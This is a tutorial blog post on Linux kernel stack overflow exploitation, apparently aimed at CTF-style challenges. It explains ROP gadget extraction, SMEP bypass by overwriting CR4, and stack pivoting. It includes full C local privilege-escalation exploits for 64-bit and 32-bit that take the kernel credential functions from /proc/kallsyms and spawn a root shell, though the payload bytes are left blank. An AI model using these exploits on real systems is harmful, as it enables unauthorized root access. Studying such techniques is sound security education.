- Introduction
- Returned oriented programming in kernel land
- Grapping gadgets
- Non executable gadget !
- Bypass smep with different techniques
- Defeating SMEP
- CR4 Overwriting
- Stack pivoting
- FULL ROP - Ropping like a pro
- Bypass smap
- Defeating SMAP
Introduction
Hi everyone, I hope you're all well, today we meet again for the second part of the series of kernel exploitation articles specialized in buffer overfow on the stack, in this part we're going to see more advanced techniques in order to bypass protection as well as initiate the rop in kernel land
Now that you are at the top in the exploitation of a basic buffer overflow in kernel land I'm going to go more into the basics we will directly come to the concrete
without further ado we will start with a small reminder of the rop technique and the differences in kernel land
Returned oriented programming in kernel land
Small reminder of the technique
The returned oriented programming is a technique of exploitation which allows to redirect the flow of the program "several times" in order to bypass protection, when I say redirected the flow "several times" I speak about the ropchain which is the chaining of gadget (executable instruction contained in the binary ending by ret, jmp, call in the case of a rop one aims at the instruction ret from where its name) the chaining of it is gadget is going to allow to be able to interact with the pile in order to change completely the flow of execution of program
It is necessary to know that in kernel land the concept is exactly the same except that some subtlety will come to bother us but we will return to it later
Grapping gadgets
First of all a question that you may have asked yourself is where to get your gadgets back?
In part 1 we had explained the different files provided during a kernel exploitation in a challenge
We will come back to one
- vmlinuz or bzImage
This file is simply the kernel itself but compressed into a single file.
It can be extracted into an ELF
executable file "vmlinux" Useful to look for gadgets when doing a rop.
But yes, here we are going to be able to extract the gadgets from the image quite simply
There is a tool that allows to extract this image in ELF executable
Developed by the great and unique Linus Torvalds here is his tool
Thanks to him we will be able to extract the executable file vmlinux which will thus take again all our gadgets! Simple isn't it ?
Let's test it next
$ ./extract_mvlinux.sh bzImage > vmlinux
$ ROPgadget --binary vmlinux > gadget.txt
( It may take a little time since we are talking about kernel gadgets, there are many of them)
Small advice extracted all your gadgets in a text file to save time in the search of gadgets because the number of gadgets is very important and therefore ROPgadget will take a little time to read everything
~/Desktop/gadget.mp4
*inpute video*
Non executable gadget !
A problem that we can meet in kernel land is the fact of finding bad gadgets, non executable gadgets...
And yes we find much less this kind of problem in userland because there is much less gadgets
It is important to know that the gadgets are taken from your program, more precisely from the sections of your program. And yes if you develop a little in a assembler language you will know that your binary is structured in sections except that in a program not all sections are executable !
You can see the structure of the sections of your program (elf) with readelf
readelf -S elfbin
Section Headers:
[Nr] Name Type Address Offset
Size EntSize Flags Link Info Align
[ 0] NULL 0000000000000000 00000000
0000000000000000 0000000000000000 0 0 0
[ 1] .interp PROGBITS 0000000000400238 00000238
000000000000001c 0000000000000000 A 0 0 1
[ 2] .note.ABI-tag NOTE 0000000000400254 00000254
0000000000000020 0000000000000000 A 0 0 4
[ 3] .note.gnu.bu[...] NOTE 0000000000400274 00000274
0000000000000024 0000000000000000 A 0 0 4
[ 4] .gnu.hash GNU_HASH 0000000000400298 00000298
000000000000003c 0000000000000000 A 5 0 8
[ 5] .dynsym DYNSYM 00000000004002d8 000002d8
00000000000001b0 0000000000000018 A 6 1 8
[ 6] .dynstr STRTAB 0000000000400488 00000488
00000000000000ba 0000000000000000 A 0 0 1
[ 7] .gnu.version VERSYM 0000000000400542 00000542
0000000000000024 0000000000000002 A 5 0 2
[ 8] .gnu.version_r VERNEED 0000000000400568 00000568
0000000000000020 0000000000000000 A 6 1 8
[ 9] .rela.dyn RELA 0000000000400588 00000588
0000000000000048 0000000000000018 A 5 0 8
[10] .rela.plt RELA 00000000004005d0 000005d0
00000000000000d8 0000000000000018 AI 5 22 8
[11] .init PROGBITS 00000000004006a8 000006a8
0000000000000017 0000000000000000 AX 0 0 4
[12] .plt PROGBITS 00000000004006c0 000006c0
00000000000000a0 0000000000000010 AX 0 0 16
[13] .text PROGBITS 0000000000400760 00000760
0000000000000252 0000000000000000 AX 0 0 16
[14] .fini PROGBITS 00000000004009b4 000009b4
0000000000000009 0000000000000000 AX 0 0 4
[15] .rodata PROGBITS 00000000004009c0 000009c0
0000000000000061 0000000000000000 A 0 0 8
[16] .eh_frame_hdr PROGBITS 0000000000400a24 00000a24
000000000000004c 0000000000000000 A 0 0 4
[17] .eh_frame PROGBITS 0000000000400a70 00000a70
0000000000000140 0000000000000000 A 0 0 8
[18] .init_array INIT_ARRAY 0000000000600df0 00000df0
0000000000000008 0000000000000008 WA 0 0 8
[19] .fini_array FINI_ARRAY 0000000000600df8 00000df8
0000000000000008 0000000000000008 WA 0 0 8
[20] .dynamic DYNAMIC 0000000000600e00 00000e00
00000000000001f0 0000000000000010 WA 6 0 8
[21] .got PROGBITS 0000000000600ff0 00000ff0
0000000000000010 0000000000000008 WA 0 0 8
[22] .got.plt PROGBITS 0000000000601000 00001000
0000000000000060 0000000000000008 WA 0 0 8
[23] .data PROGBITS 0000000000601060 00001060
0000000000000010 0000000000000000 WA 0 0 8
[24] .bss NOBITS 0000000000601070 00001070
0000000000000010 0000000000000000 WA 0 0 8
[25] .comment PROGBITS 0000000000000000 00001070
0000000000000029 0000000000000001 MS 0 0 1
[26] .symtab SYMTAB 0000000000000000 000010a0
00000000000006f0 0000000000000018 27 47 8
[27] .strtab STRTAB 0000000000000000 00001790
0000000000000295 0000000000000000 0 0 1
[28] .shstrtab STRTAB 0000000000000000 00001a25
0000000000000103 0000000000000000 0 0 1
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
L (link order), O (extra OS processing required), G (group), T (TLS),
C (compressed), x (unknown), o (OS specific), E (exclude),
l (large), p (processor specific)
Bypass smep with different techniques
In this part we will see how to bypass this terrible protection which is smep with the rop technique and a stack pivoting
reminder:
- SMEP
Supervisor Mode Execution Prevention (SMEP) can be used to prevent the supervisor mode from unintentionally executing user space code. for example kernel pointers (symbols) found in /proc/kallsyms can not be used without bypass
Let's see how it works !
CR4 Used in protected mode to control operations such as virtual-8086 support, enabling I/O breakpoints, page size extension and machine-check exceptions.
Looking at the status of the cr4 register we can see that smep is active when bit 20 is set to 1
// [arch/x86/include/asm/processor-flags.h]
#define X86_CR4_SMEP 0x00100000 /* enable SMEP support */
CR4 = 0x00000000001407f0 // smep activatade here
CR4 register value 0x1407f0 = 0001 0100 0000 0111 1111 0000
( start at 0,1,2,3,...)
Defeating SMEP
There are several strategies to bypass the smep
CR4 Overwriting
Smep is defined when the 20th bit of CR4 is set to 1, but what if we just change it?
And yes if there is a register in memory who is responsible for the activation of smep, rewriting this register would be a solution
During the execution in kernel mode we will be able to rewrite on this register
For this we will make a ropchain
But wait a minute, you need to know one thing first. The register is completed by using a kernel symbols called native_write_cr4()
, it's this function that allows to define the activation of the protection such as smep, smap,... it means that to bypass smep it will be necessary to assign a value to it so that the 20bit of the register is not any more has 1 but has 0
native_write_cr4(value)
our value will be 0x407F0
to be desactivate (the value of cr4 with the 20th bit null)
don't forget that the value of your register can depend on don't copy stupidly from my article but change this value by transforming the hex value to binary and change the 20th bit to 0
we will use a gadget to pass an argument (0x407F0)
to the register rdi which is the first register in the convention in order to define the parameter 0x6f0
for the function native_write_cr4()
in the end our function will be executed with the right parametre
0xffffffffc12e57f2 pop rdi ; ret
0xffffffffc1045050 t native_write_cr4
But since the function just does a mov
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
you can rop to mov a value in cr4 like this:
0xffffffffc12e57f2 pop rdi ; ret
0xffffffffc1045053 : mov cr4, rdi ; ret
32BITS:
small equivalence in 32bits the concept remains the same but the conventions are not the same
With native_write_cr4()
:
0xffffffffc12e57f2 pop eax ; ret
0xffffffffc1045050 t native_write_cr4
With mov cr4, src
:
0xffffffffc12e57f2 pop eax ; ret
0xffffffffc1045053 : mov cr4, eax ; ret
Except that there is a problem...
This technique doesn't work anymore in our recent kernel because the function now is patched and it checks that the value doesn't change throughout the execution and if it does the value is reset to the starting value
void native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;
set_register:
asm volatile("mov %0,%%cr4": "+r" (val) : : "memory");
if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}
You can see that here the CR pinning is implemented in the function
while in older versions it is not implemented:
static inline void native_write_cr4(unsigned long val)
{
asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}
which means that this technique is only valid for the oldest kernels !
In spite of the fact that the function is patched I still concocted a little exploit for you:
64Bits:
Diagram:
- Overwriting cr4 reg.
- Ret2usr.
- Spawn shell
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
int fd;
unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
unsigned long kallsym_getaddr(const char* str)
{
FILE *stream;
char fbuf[256];
char addr[32];
stream = fopen("/proc/kallsyms","r");
if(stream < 0) {
puts("Failed to open /proc/kallsyms");
return 0;
}
memset(fbuf,0x00,sizeof(fbuf));
while(fgets(fbuf,256,stream) != NULL) {
char *p = fbuf;
char *a = addr;
if(strlen(fbuf) == 0)
continue;
memset(addr,0x00,sizeof(addr));
fbuf[strlen(fbuf)-1] = '\0';
while(*p != ' ')
*a++ = *p++;
p+=3;
if(!strcmp(p,str))
return strtoul(addr, NULL, 16);
}
return 0;
}
void get_shell(void) {
if (getuid() == 0)
execl("/bin/sh", "sh", NULL);
else
puts("[x] Failed to spawn root shell");
}
unsigned long user_cs, user_ss, user_rflags, user_sp;
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}
void escalate_privs(void)
{
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" //prepare_kernel_cred
"xor rdi, rdi;"
"call rax; mov rdi, rax;"
"movabs rax, 0xffffffff814c6410;" //commit_creds
"call rax;"
"swapgs;"
"mov r15, user_ss;"
"push r15;"
"mov r15, user_sp;"
"push r15;"
"mov r15, user_rflags;"
"push r15;"
"mov r15, user_cs;"
"push r15;"
"mov r15, user_rip;"
"push r15;"
"iretq;"
".att_syntax;"
);
}
int open_fd_device(void)
{
fd = open("/dev/bufferoverflow", O_RDWR);
if (fd < 0) {
printf("[x] Error openning the FD");
return -1;
} else
printf("[+] File descriptor is open\n");
}
int main(void)
{
commit_creds = (void *)kallsym_getaddr("commit_creds");
prepare_kernel_cred = (void *)kallsym_getaddr("prepare_kernel_cred");
unsigned char payload[] =
"" // offset to reach eip
"" // pop rdi ; ret
"" // new value for CR4 register
"" // mov cr4, rdi ; ret
""; // escalate_privs function's address
open_fd_device();
save_state();
write(fd, payload, sizeof(payload));
}
// gcc -static exploit.c -o exploit
32Bits:
Some functions are not the same like trap_frame, prepare_tf. To make you understand, these functions are similar to the register state saving, so they allow to ret2usr in 32bits
Diagram:
- Overwriting cr4 reg.
- Ret2usr.
- Spawn shell
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
int fd;
unsigned long __attribute__((regparm(3))) (*commit_creds)(unsigned long cred);
unsigned long __attribute__((regparm(3))) (*prepare_kernel_cred)(unsigned long cred);
unsigned long kallsym_getaddr(const char* str)
{
FILE *stream;
char fbuf[256];
char addr[32];
stream = fopen("/proc/kallsyms","r");
if(stream < 0) {
puts("Failed to open /proc/kallsyms");
return 0;
}
memset(fbuf,0x00,sizeof(fbuf));
while(fgets(fbuf,256,stream) != NULL) {
char *p = fbuf;
char *a = addr;
if(strlen(fbuf) == 0)
continue;
memset(addr,0x00,sizeof(addr));
fbuf[strlen(fbuf)-1] = '\0';
while(*p != ' ')
*a++ = *p++;
p+=3;
if(!strcmp(p,str))
return strtoul(addr, NULL, 16);
}
return 0;
}
struct trap_frame {
void * eip ; // instruction pointer
uint32_t cs ; // code segment
uint32_t eflags ; // CPU flags
void * esp ; // stack pointer
uint32_t ss ; // stack segment
} __attribute__((packed));
struct trap_frame tf;
void get_shell(void) {
if (getuid() == 0)
execl("/bin/sh", "sh", NULL);
else
puts("[x] Failed to spawn root shell");
}
void prepare_tf(void)
{
asm("pushl %cs; popl tf+4;"
"pushfl; popl tf+8;"
"pushl %esp; popl tf+12;"
"pushl %ss; popl tf+16;");
tf.eip = &get_shell;
tf.esp -= 1024; // unused part of stack
}
void escalate_privs(void)
{
commit_creds(prepare_kernel_cred(0));
asm("mov $tf, %esp;"
"iret ;");
}
int open_fd_device(void)
{
fd = open("/dev/bufferoverflow", O_RDWR);
if (fd < 0) {
printf("[x] Error openning the FD");
return -1;
} else
printf("[+] File descriptor is open\n");
}
int main(void)
{
commit_creds = (void *)kallsym_getaddr("commit_creds");
prepare_kernel_cred = (void *)kallsym_getaddr("prepare_kernel_cred");
unsigned char payload[] =
"" // offset to reach eip
"" // pop eax ; ret
"" // new value for CR4 register
"" // mov cr4, eax ; ret
""; // escalate_privs function's address
open_fd_device();
prepare_tf();
write(fd, payload, sizeof(payload));
}
// gcc -static -m32 exploit.c -o exploit
Stack pivoting
In this part you will learn how to bypass it by creating a fake stack
The fake stack is the consequence generated by the stack pivoting the concept of the stack pivoting is simple, the value of the stack pointer must be changed by a memory area that can be controlled by us Still in the technique of using the rop technique we will chain gadgets to build a fake stack
This means that our stack pointer could be changed thanks to our ropchain and so the execution flow of the program will be redirected to a "fake stack" because the pointer points to another zone
Hence the name "stack pivoting" the stack pivots
Remember that the stack is defined by its pointer rsp register ( or esp in 32bits)
You will surely think of using a gadget mov rbp, reg ; ret
except that unfortunately this gadget is not the most optimized way to do stack pivoting
Of course you can but you will lose the current value of the stack
And fixing it afterwards would be too big a waste of time
That's why we will use another gadget that uses the xchg
instruction
Let's see together its functionality
> This instruction allows to exchange the value of two operands. The operands can be 2 general purpose registers or a register and a memory location. If a memory operand is referenced, the microprocessor lock protocol is automatically implemented for the duration of the exchange, whether or not the LOCK prefix is present.
And yes, with this instruction we can exchange the value of rsp with another register
A gadget like this one xchg rsp, rdi ; ret
would therefore exchange the value contained in rdi and place it in rsp and the same for the value of rsp
by doing this we will be able to prepare our fake stack
but the process is not yet finished
now the pointer points to this memory area but how to control it
mmap() creates a new mapping in the virtual address space of the
calling process
By mapping a memory page we can "configure" and have an entry point to our frake stack
void stack_pivoting(void){
fake_stack = mmap((void *)0x44444444 - 0x1000, 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
unsigned off = 0x1000 / 8;
fake_stack[0] = 0xdead; // avoid double fault
fake_stack[off++] = pop_rdi_ret;
...
}
we will mmap a fixed page, then start writing our ropchain
The fact of mapping 0x44444444 - 0x1000
is necessary to avoid that there is not enough memory space
You should also write any value to index 0 to avoid double fault
double fault exception occurs if the processor encounters a problem while trying to service a pending interrupt or exception.
The reason for this is that the page is only inserted into the page table after it has been accessed, not after it has been mapped. We have mapped 0x2000 bytes, which is equivalent to pages 2. We put the ROP string completely on the second page, so we have to go to the first page as well.
here is a small diagram to summarize the stack pivoting:
FULL ROP - Ropping like a pro
soon..
Bypass smap
Defeating SMAP
soon...